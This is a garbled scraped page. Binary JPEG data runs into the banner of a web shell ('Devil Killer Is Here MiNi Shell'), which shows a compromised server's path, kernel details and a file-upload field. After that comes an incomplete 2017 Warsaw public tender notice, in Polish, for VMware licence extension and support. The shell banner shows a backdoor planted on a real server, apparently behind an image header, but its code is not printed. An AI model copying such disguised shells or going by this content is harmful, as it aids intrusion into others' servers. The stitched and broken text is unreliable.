JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170301/34231-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 34231 - 2017
              z dnia 2017-03-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Rozszerzenie licencji wraz z przedłużeniem wsparcia Vmware<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Stołeczne Warszawa, krajowy numer identyfikacyjny
              015259640, ul.
              Pl. Bankowy 
              3/5,
              00-950 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              +48 22 4431400, e-mail
              mkaras@um.warszawa.pl, faks
              +48 22 4431402.
              <br />
              Adres strony internetowej (URL): https://www.um.warszawa.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://ogloszeniabzp.um.warszawa.pl/info.php?zamowienie=55268</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wniosek należy złożyć w formie pisemnej w trwale zamkniętym opakowaniu <br />
                Adres:
                <br />Biuro Zamówień Publicznych Urzędu m.st. Warszawy ul. Senatorska 36, 00-095 Warszawa, IV piętro, pok. 413</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Rozszerzenie licencji wraz z przedłużeniem wsparcia Vmware<br /><b>Numer referencyjny: </b>ZP/AB/271/II-24/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1) Przedmiotem zamówienia jest rozszerzenie licencji wraz z przedłużeniem wsparcia Vmware, na warunkach określonych we Wzorze umowy, który znajduje się w pkt IV.4. niniejszego ogłoszenia.
2) Zamawiający oświadcza, że aktualnie posiada wieczyste licencje obejmujące następujące pola eksploatacji na korzystanie z oprogramowania:
a. vCenter Server 6 Standard 1 instance  Basic Support do 30.04.2017,
b. vSphere 6 Enterprise Plus 20 CPUs  Basic Support do 30.04.2017,
c. vCenter Server 6 Standard 1 instance  Basic Support do 02.06.2017,
d. vSphere 5 Enterprise Plus 4 CPUs  Basic Support do 02.06.2017,
e. vSphere 6 Enterprise Plus 4 CPUs  Basic Support do 05.04.2018.

3) Szczegółowy opis przedmiotu zamówienia zawarty został we wzorze Umowy, którego treść znajduje się w pkt IV.4 ogłoszenia (wzór Umowy stanowi również załącznik nr 3 do wniosku o dopuszczenie do udziału w licytacji elektronicznej).<br /><br /><b>II.5) Główny kod CPV: </b>72591000-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              365853.66<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>1. Termin realizacji przedmiotu zamówienia: 
a)  do 30 dni od dnia podpisania Umowy Wykonawca jest zobowiązany do:
- dostarczenia Zamawiającemu pisemnego potwierdzenie przyznania Zamawiającemu wsparcia technicznego i rozszerzenia licencji na oprogramowanie i pola eksploatacji wymienione w § 2 ust. 1 i ust. 2 wzoru Umowy; 
- przeprowadzenia w autoryzowanym przez Producenta ośrodku szkolenia, o którym mowa w § 2 ust.1 pkt 3 wzoru Umowy;
b)	usługi wsparcia technicznego, o których mowa w § 2 ust. 1 pkt 1 wzoru Umowy będą świadczone co najmniej do dnia 30 kwietnia 2020 roku.
2. Wzór wniosku o dopuszczenie do udziału w licytacji elektronicznej (stanowiący załącznik nr 1 do ogłoszenia) wraz z Załącznikami można pobrać ze strony http://ogloszeniabzp.um.warszawa.pl/info.php?zamowienie=55268 
3. Wykonawca ma prawo złożyć tylko jeden wniosek o dopuszczenie do udziału w licytacji elektronicznej. Złożenie większej liczby wniosków, spowoduje odrzucenie wszystkich wniosków złożonych przez danego Wykonawcę. 
4. Wniosek oraz wszelkie wymagane dokumenty muszą spełniać następujące wymogi: 
a) wniosek musi zostać sporządzony w języku polskim z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem; 
b) formularz wniosku i wszystkie załączane dokumenty sporządzone przez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis z pieczątką imienną przez osobę(-y) upoważnioną(-e) do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej; 
c) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do wniosku musi być załączone pełnomocnictwo, określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii; 
d) pozostałe oświadczenia i dokumenty muszą być oryginałami lub kserokopiami poświadczonymi na każdej stronie za zgodność z oryginałem przez właściwą osobę(-y), zgodnie z zasadą oraz muszą być one sporządzone w języku polskim; 
e) poprawki lub zmiany (również przy użyciu korektora) we wniosku, powinny być parafowane własnoręcznie przez osobę (-y) podpisującą(-e) wniosek; 
f) dokumenty składające się na wniosek muszą być sporządzone wg wzorów i wymogów Zamawiającego; 
g) dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
5. Wniosek wraz z załącznikami należy złożyć w zamkniętej kopercie opatrzonej co najmniej nazwą przedmiotu zamówienia. 
6. Postępowanie o udzielenie zamówienia publicznego jest prowadzone w trybie licytacji elektronicznej na podstawie przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2015 r. poz. 2164 ze zm.), zwanej dalej ustawą. 
7. Numer postępowania: ZP/AB/271/II-24/17. Wykonawcy winni we wszelkich kontaktach z Zamawiającym powoływać się na w/w numer postępowania. 
8. Wniosek składany wspólnie Zamawiający dopuszcza możliwość składania wniosku przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taki wniosek spełniać będzie następujące wymagania: 
8.1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. 
8.2. Oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie powinien być załączony do oferty 
i zawierać w szczególności wskazanie: 
a) postępowania o zamówienie publiczne, którego dotyczy, 
b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, 
c) ustanowionego Pełnomocnika oraz zakresu jego umocowania. 
8.3. Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie 
o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
8.4. Oświadczenia, wykaz lub formularze sporządzone na załączonych do wniosku wzorach, składa 
i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających wniosek wspólny. 
8.5. W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (nie musi ich spełniać każdy z Wykonawców składających wniosek wspólny osobno). 
8.6. Oświadczenie i dokumenty, o których mowa w pkt III.7) lit. a) i c) każdy z uczestników oferty wspólnej składa indywidualnie.
8.7. Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą lub Pełnomocnika. 
8.8. Formularz wniosku musi zostać podpisany przez Pełnomocnika lub wszystkich Wykonawców.
8.9. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu wniosku. 
8.10. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. 

9. Tajemnica przedsiębiorstwa: 
a) W przypadku gdyby wniosek, oświadczenia lub dokumenty zawierały informacje, stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca winien, nie później niż w terminie składania wniosków, w sposób nie budzący wątpliwości zastrzec, które informacje stanowią tajemnicę przedsiębiorstwa. 
b) Zgodnie z art. 11 ust. 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji 
(t. jedn. Dz. U. z 2003 r. Nr 153, poz. 1503 ze zm.) przez tajemnicę przedsiębiorstwa rozumie się nieujawnione do wiadomości publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności. 
c) By zastrzeżenie o którym mowa wyżej było skuteczne, Wykonawca zobowiązany jest przedstawić dowody na to, że: 
 zastrzeżone informacje maja charakter techniczny, technologiczny, organizacyjny lub inny posiadający wartość gospodarczą, 
 zastrzeżone informacje nie zostały ujawnione do wiadomości publicznej, 
 podjęto w stosunku do nich niezbędne działania w celu zachowania poufności. </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a) Dokument (np. pełnomocnictwo, odpis z właściwego rejestru, np. Krajowego Rejestru Sądowego, informacja o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej Polskiej lub umowa spółki cywilnej, itp.) potwierdzający, iż wniosek został podpisany przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do wniosku; 
b) Wypełniony formularz wniosku o dopuszczenie do udziału w licytacji elektronicznej /zwany dalej wnioskiem/ o treści zgodnej z określoną we wzorze stanowiącym załącznik nr 1 do ogłoszenia; 
c) Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania - wg wzoru określonego w załączniku nr 1 do wniosku; 
d) Oświadczenie Wykonawcy o podwykonawcach, ze wskazaniem części zamówienia których wykonanie zamierza powierzyć podwykonawcom z podaniem firm podwykonawców lub informacja o samodzielnym wykonaniu zamówienia, o treści zgodnej z określoną we wzorze stanowiącym załącznik nr 2 do wniosku; 
e) Wykonawca zagraniczny składa dokumenty zgodnie z zapisami pkt sekcji III, ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z wnioskiem potwierdzały, że wniosek został podpisany przez osobę/y uprawnioną do reprezentacji Wykonawcy; 
f) W przypadku gdy wniosek o dopuszczenie do udziału w licytacji elektronicznej zawiera informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest przedstawić dowody na to, że: 
- zastrzeżone informacje maja charakter techniczny, technologiczny, organizacyjny lub inny posiadający wartość gospodarczą, 
- zastrzeżone informacje nie zostały ujawnione do wiadomości publicznej, 
- podjęto w stosunku do nich niezbędne działania w celu zachowania poufności. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                licytacja elektroniczna
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
